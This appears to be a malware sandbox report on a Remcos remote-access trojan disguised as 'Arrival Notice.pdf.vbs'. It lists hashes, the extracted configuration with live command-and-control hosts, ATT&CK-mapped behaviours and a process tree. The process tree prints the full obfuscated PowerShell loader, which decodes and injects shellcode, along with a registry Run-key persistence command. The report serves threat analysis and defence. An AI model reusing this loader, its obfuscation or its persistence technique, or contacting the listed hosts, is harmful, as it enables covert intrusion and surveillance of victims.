remcos | 98e33bbf025874d3eeaaed82fe28c4abdae2dc8cbd4a24e2a33da6782cc54dad

General

Target

Arrival Notice.pdf.vbs
Size

654KB
MD5

e199b7905848f5475ba9dcaddc2d1780
SHA1

58c10960ca5af48e35668a383ce72c91d0ceca91
SHA256

98e33bbf025874d3eeaaed82fe28c4abdae2dc8cbd4a24e2a33da6782cc54dad
SHA512

9c30ff0aa30608e1454feefba22a8cc5fd78afb331ebaa904ee6da495ac225d8f500ff2359c6d65175f73996498f41ece06e4863c7dd7f14372ec7497e932849
SSDEEP

12288:LbIqRyG2Gn8phCMbO1rBOsKRmtwTdxwC1DqKablH0COCHUO6:LRRWGn+EBLUDTdmaqBbl9HUO6

Score

10^/10

remcos bbn persistence rat

Malware Config

Extracted

Family

remcos

Botnet

BBN

C2

bustabantu1996.ddns.net:6699

bustabantu0817.duckdns.org:6699

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-MH9LUG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2440	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reklapstolene = "%Sit% -w 1 $Sknaanden=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Proctorage;%Sit% $Sknaanden"	ieinstal.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{6E1805FF-EB7D-4D97-AF68-02602C9AA90A}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{78081215-7847-4C92-9DC4-DC330537BA93}.catalogItem	svchost.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4256	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5100	powershell.exe
4256	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5100 set thread context of 4256	5100	powershell.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5100	powershell.exe
5100	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5100	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5100	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 5100	2440	WScript.exe	77
PID 2440 wrote to memory of 5100	2440	WScript.exe	77
PID 2440 wrote to memory of 5100	2440	WScript.exe	77
PID 5100 wrote to memory of 1680	5100	powershell.exe	94
PID 5100 wrote to memory of 1680	5100	powershell.exe	94
PID 5100 wrote to memory of 1680	5100	powershell.exe	94
PID 1680 wrote to memory of 924	1680	csc.exe	95
PID 1680 wrote to memory of 924	1680	csc.exe	95
PID 1680 wrote to memory of 924	1680	csc.exe	95
PID 5100 wrote to memory of 4256	5100	powershell.exe	100
PID 5100 wrote to memory of 4256	5100	powershell.exe	100
PID 5100 wrote to memory of 4256	5100	powershell.exe	100
PID 5100 wrote to memory of 4256	5100	powershell.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice.pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Mounias = """notaAdupldSumldEpic-StadTteoryIndtpNonseKlar Spec-SammTVedayOverpPlucedrovDCreaeCartfExceiMomsnUnfiiSpittUdskiAfstoNonrnTaiv Enca'MethuLenisJuleiIrlinComegFrib OmgaSSeksyAkvasPremtOtioeFruimUnte;TopbuforesPytoiSuppnsystgComp CarbSPreoyRestsNitrtUncoeDefimAunt.StefRRaakuAntanForetgoediPampmScoueTjen.OverITasknProgtEmiseMusirKassoPaakpLei SAgnoeCalerAlchvWardiKatacSkageArissSukk;VavapmaltuBrombisoplUndeiAnnocLame FarcsdkketStenaTeretKendistudcMors UnsucArtilStouaUndesRauwsugte PeseVCzarePolejPenslChomeErhvdSkolnTaluiBarynTachgAfgreAnnenEdwi1Sece Outr{Gene[SlngDHornlpastlAnimIBradmGatepHemeoProtrImpltAfsk(male`"""UrosuAnklsChikeUbanrHelb3Cind2Timb`"""kikk)Skyl]ErgopNudiuFrizbfrdilGtc iUnpicFair brodsAfmitGgekaCalotBedaiDamecBegr HitceSaltxOrthtHypoeUdlerKaffnSwar KakkiHavmnTikrtOmsl ButaIBeunsProtIopgacBebooChlonSammiTramcFort(SekriFrisnForstSkat ShopUDarenGhrufTogg3Tele9Skrm)Fljl;Atte[SonaDUnrilAtmolCondIEpitmholapVoksospagrEksptFrin(Sogn`"""FiligAnaudBetainaiv3Pigm2Kaff`"""Slut)Spil]SemipConfuAntibTvenlRembiStracSteg PlassBematJackakommtteleiDestcRago NonteBuckxPoettPlaneFejlrSejlnInfl StatiPhonnFedttPror TrovGKnifeDeretCikoDFlerIClarBDimeiSongtFarvsTilb(FritiRetanmonotPedi LokaOAikivKonteTangrLeftaVaad,BandiContnProctStor SideMbreaaGuytlPart,StruiTilrnIndttVilk ImprBTaknyhenrdAngl,OplriPropnRwantFunk BrorPLivssIchtyOrdscPrerhSevroFysi8Besk9Feme,AuguiIrksnTradtDebu ChapFKaffeSpaadBefj,JagtiStarnForstOpso UdsoPRadiyOverlSolfoBods6Vaku4Grun,PlaniKnsknhalvtship IndoSTipskDuotyPensdStemeAmtssBefo)Gdni;Padd[KlatDAerolRadulSkatISmaamNonepAtomoNedsrSoddtNorb(Sple`"""PantgphredBnkeiDama3Abri2Pate`"""Refr)Ugle]skibpFarvuAegibPerslSkriiDybvcPart LithsEpautSkdnaDynatBambiKalkcVici FalsetearxEksetLichethomrSkuenUnic SoufiDesenCyrttpara byceGtilsetalgtCottTMonoeFolkxGiddtUnlaCSagshflyvaVandrMidtskalkeDisptOktaIBrddnOpinfDelioHomi(BortisupenHypetRytt TranSHemieHomenYodhdNonveNonpbGran,BouiiGrisnGraatSinn ProvEEpislEksieTonekLany,NedniOmklnRotatInac CresSActiiSognrSljeeFodsdEpis)Afbr;Dism[UnexDcodelAntilMetaIComimDeplpSyphoSilerAsintSara(Caga`"""ParokFluielnmorUndenAnsiecurvlElde3Beha2Resu`"""Narc)Nont]FlerpNabouSegrbTelolNilpiTredcPoki ReicsFdektNattaForttSydoiRestcSenn ObsteIngexDetatTitmeKhutrSpinncoch FemtiIndinEpirtKomm ContLEgleoembecDefiaResulDiduFToxiiTmrelDocueAnskTSkiniProcmTordeAfgaTTrimoTomnFsproiSamblGloaeBrikTSibeiChonmBotceSpyg(TeksiEncenNrmetUnpu HencECholkUndesBasilSydy,SpigiUnbanObratGrmm QuakAImpenTorntHemiiSukk)Deto;Arta[MothDKalllWizelvirgIprfemTrunpSlmmoPhytrBrnetBomb(Para`"""AtomuSupesKarieTautrErga3Vold2Voka`"""Prot)Asph]FortpTilbuSalibFarelGuariBremcClam BrunsMelltReviaAnaltratiiSylecUnra AarreCrevxUmantIncueInnorFremnHjre ShoriContnovertNatu UpaaEViljnHistuJacomMuntPSvinrFornoOverpSkaksVide(FiskiTeernAgontLabo ParkRImpleSkursAlcapVirgoFili,OmbuipretnCardtBorn ClinBPostaForfdurosnforbeUnchsUnwa)Tree;Seph[StanDamorlIntelIndsIEquimSaglpAromoMicrrslumtBall(Stit`"""PrergSkewdSalmiAcau3Addl2Bett`"""Skel)Dire]MolypCircusyrebDuellEye iPakkcHydr VasasGadstUndeaVinktKrykiTrancOrdi WorkeSolexCooptCardeShorrKrignSubc MaliiArgunprintLead SkilGPhoteForutEighOLeptbAserjBesteFamecTromtPati(StegiTalmnUnprtPoin WiteKLejeuSagslAplo1Offe0Flad,LensiDournAutotUnma StamRAtheaDogmsCrathKlit,SkaliWaddnAutotNono SundKErobaSkainElve)Mutu;Uncr[SociDDeselCruslAttrIAstimSemipVerboDyrerAniltFald(Asto`"""TarawmudfiEan nSkansRepepErgooOrdioSylvlAvis.InitdInddrForsvSpat`"""Fedt)Taxi]HenspParauLsesbFanglEminiLucocTach HydrsOrigtUdlgabltetMartiHomacCory TroweSandxKrigtGradeHavnrStornAudi LucaiParknKapitBere TuriABortddl fdBegrJFiveoFresbUnco(SkisiFronnnonrtAkkv tithAOvereArbogDansiProb2Oliv4Tilb3Foot,SviniLivsnReagtFrem KnopFMiniasteadkole,AarsiMochnStortNatt InpaTTavliUndecJourtOctoiTeltcamts,PresiInfinSkumtTagp Roe SResovK BeeDistnMorfdDron1Nonp7Hvid9Disc,ddsaicreanAga tspri StamASubtrKislrCalciFdslvDeepeSlag)Munt;Lage[SamlDRegilAutolBlseIHistmTvilpDemooComprPodstKutt(Mast`"""SillgTeksdMyxoiafsl3Hove2Svab`"""Shut)Rygs]SkufpGuinuMissbPotelSansiNervcGorb KrumsSerotkommaDeritUnsoiStrecTamb StoreRevexLrestRegaeRadsrSpndnflin AbiliTroondksttUdsn TraaSHnemwChroaCentpServBUncouEvenfBagafsludeMinerDdsasUdha(DataiGrumnomnitOver LinjjRestoNeurhBrndaDivenDelisPage)Tilb;Stil[maleDBolblNonplSeriITilkmSoropUhenoBlanrHexatAdsp(Moon`"""ShutgLinidVariiUdtr3Avls2Crit`"""Pseu)metr]AabepbrucuHianbSubplHandiIncicDavi PerisFormtBortaBesttChapiSlimcDiso FldnePimpxAghatAspieMejsrPasfnSpir MegaiTawenTakotEnto DemaGSnigeUnditEgnsECrypnKlathPamfMrecaeNonetHalvaRecoFYanniWatelZeroeTung(BaghiMilinUgestHove FlkkCHjlpaNepheDios)Tilb;Kdfu[BygnDValalIndflJuthIAlphmStyrpStunoIldfrDualtPree(driv`"""ResugHottdSpadiMang3Subd2Navn`"""Luja)Keyn]UkulpTjreuOpmubLithlstemiVoltcTere BramsPrestUdreaHilltPhytiPermcVerg Mo ReSpidxSomrtPriseFalmrMarinSyst GevkiSupenBetotDaad InclFHipprMisdaResimFlaueInstRglingNaadnLinj(WoodiAlkanDinotHemo TaarOSmanuKlontPoucpBatc1Filo7Prel3Pseu,HerbiSmagnArbethigh FileFSophiSprnbPycneCenorMene8Peng4Undu,StyriRownninbbtKont MuniUMaesdekstsKakotSkra,DeciiVmmenShuntAdro AequDBedsrStoksAecilDipegLreb,LaziiCymbnSpjttChit SkanFLechoreprrAnthlTali)Long;Dysf[ReviDLighlSelvlLoatISigumIntepKviloTriorRepatTran(reaf`"""animkPolyeNortrForknFasheCitalKemo3Geno2Krea`"""Galo)Cass]PrompSkaauTailbAbealYoutiTllecRets PolyscowwtOegeaSkndtHyldiSteecInse ElekeJoakxFaritEmileJagtrConsncons UnmoiAutonOvertAaki Ke HVPrefiMelorMalntfratuDawsaTunnlTeleAhalvlBetllNondoLovgcDisp(ChriiSlutnBolitBeat KorevPect1Rund,CelliHystnintetMars SchivBekj2Fare,DeboiKontnUgebtbros Kronvstoc3Bino,ionpiKlimnSuzatOuts Johavindk4Musk)Reca;cons[SyriDAdjulMetalSkifIGasrmIrrepAnmeoShawrKinetSubv(Ecop`"""AfsnkFleteHyocrKuvenRedbePartlVoid3Hawa2Eve `"""horn)Krig]MrkepSkinuskelbDiaslSchliPortcCons BetwsShirtLeksaNonstBraniOrthcSlag WhipePoinxemoltGeneePincrMaurnAfle UncoIPseunNonetTendPKlestUdberExto PlanEStoknSnrluMedimUligSEgefySkibsInfltkommesockmReamLSalvoFraccRestaVololDeodeVedesFremADeca(BracuSurpiRegrnStedtPrev LockvWate1Exch,UndeiSoranDelptExac SivavKise2Letp)Lrer;Spec}auto'Fodb;Tjer`$KighVTyrkeDkbljTouplSkoteBygadOpsgnUraniVirknCurrgOphteagernAnti3fors=Kntr[TilbVtreneMirrjUmrklmeloeUnshdLdernAeroirestnCashgUdspeAgronUvae1Ansi]shen:Comp:CotiVberiiPlanrSpiltsemiuMaunaCorelOutiAMarglAfholCampoInsacReje(Booz0Adsp,vide1Flyv0Eter4Baby8Lidy5Knub7Opfr6Roer,Nyhe1stil2Dagv2Quin8Herm8Natu,Bakt6plas4unob)Unde;Tvet`$PostFAskiiTriprMaveeTras=Clan(imbiGPaakeSynstPrim-IdeaIfusitgnideLantmAutoPEozorFunkoPuripRetreBladranortCeroyNumr Marc-TrepPTabuaFacitPolihOpvu Bran'StasHFejlKBeboCHadrUWhid:Chia\TrreSReinoJordfBedatIgnowSpayaFilirAnaceTile\FondEremigUrinoCatatSamorRekriWaddpRealsGaff'Bamb)Serv.PostFKunsoCigalFendkSmineZoonpNummaChicrKorttAfpriBermeResirDeccntigreHarvsComp;Beha`$TwelLSurmoTruswShiraBlobnescucForbeColt Brer=Agie Pens[BeweSSmrtyCleasUnsttCoineShrimPres.PortCModfoRentnBassvScraeTrutrBaartDoro]Ossi:Modb:SegiFFrekrKalloAnlgmBulgBSkudaOligsRapneDiss6Guny4paraSGarttRaadrPhosiMagnnSigngTyss(Allu`$MaryFFactiRhinrLadyeMarg)Dipl;Rigs[GlanSDuefyThadsHomatInddetoddmFami.ConcRGeraugurnnRavntSoliiTignmBefieTear.DireIPartnCubitPartePhobrHardoAnrepfledSDur eLuckrLagevFootiIndhcApaceCocusBori.BusbMFunkaPistrSlagsNecrhStyraNutrlInte]Inco:Blok:KranCChumoBlaapHjeryPhle(Farv`$OmlyLPutroborgwMiniaGarvnKakacSkameStak,Elec Berg0Ufor,Cast Wear Tjen`$BestVGoldePrepjXenolJuiceFlotdPoinnBrukiAttrnDinggMisdeNyttnpref3Lysn,Clif Mind`$MicrLmicropirowDictaThisnshrecWheeeRefl.MicrcUnhaoSaccuAntenJordtSofi)Coro;Wale[SlotVpouleUndejGunglForteAntidLindnAteiiOccanFordgGrueeSupenChro1Ggeh]Betr:File:BondEFangnForeuDinemUnadSStipySpursEhletKypeeMetemWladLOlinoBekocpyraaNonelberoeIndksLydeASydo(Mucr`$CarcVBundeBudgjOppulSectesnehdSelvnPolyiHulknSprugTomteGoosnUnsa3Gree,Lege Lang0Frue)Flso#Trik;""";Function Vejledningen4 { param([String]$HS); For($i=4; $i -lt $HS.Length-1; $i+=(4+1)){ $Puttock = $Puttock + $HS.Substring($i, 1); } $Puttock;}$Jesuitters0 = Vejledningen4 'UnpaISpheEDesmXPorc ';$Jesuitters1= Vejledningen4 $Mounias;& ($Jesuitters0) $Jesuitters1;;"
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xzruf31e\xzruf31e.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp" "c:\Users\Admin\AppData\Local\Temp\xzruf31e\CSC5875552A74D94EBEAF83DD5D32CBA1CE.TMP"
      4⤵
      PID:924
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    - Checks QEMU agent file
    - Adds Run key to start application
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4256

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:5028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

4

T1012

System Information Discovery

5

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp

Filesize
1KB

MD5
ea24e61fefb62362740304cb851151b9

SHA1
baf9bbec477e36c86927e5fa48b982acafcdb112

SHA256
5c9329dbce2bfb8bc00237a96a7f3494e5bb0c4b91697d0aa85c55538e9424ac

SHA512
e664137c694ffa0de8d60a0fa881919874daf52c95a00d611ab572fe26919a01ef565a5c1581383a66a4c38a68611bce9e063878a3aee9edf0fba2d4179b3669

Download Submit
C:\Users\Admin\AppData\Local\Temp\xzruf31e\xzruf31e.dll

Filesize
4KB

MD5
20b96e41b22abc77ec07d65d889349f1

SHA1
3f4f6839558cacd8d8549e06edd3570d401dffb0

SHA256
8348b6860c6e6eef7d734bfd358ffed633d2819cfd4e68a31eebac269c6a061e

SHA512
4f89c81cb07e4ac7d4a766e3ae19417426bf4c71fb3c650e3944e360704184edb861e6734170ad6287747456e0f7acbde8125a8d197052547762e5e3ef3663f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xzruf31e\CSC5875552A74D94EBEAF83DD5D32CBA1CE.TMP

Filesize
652B

MD5
5dbaf990a41c112988897cbfa8fd4b51

SHA1
26a47731d0cf79136617c4c4d52d401b10873fed

SHA256
88c0b0ddf51bdbb3d5119c5aee923464c3174928706e4d29c407dd0b2ad6a878

SHA512
b90a6529f44ab143ec1b1c0773a0a15ba2efaf519b94bda2b1896a59498e12b34c2108c087173e2608956ddfb8c23adecb770d0ff84304f3ca104490bb96cb95

Download Submit
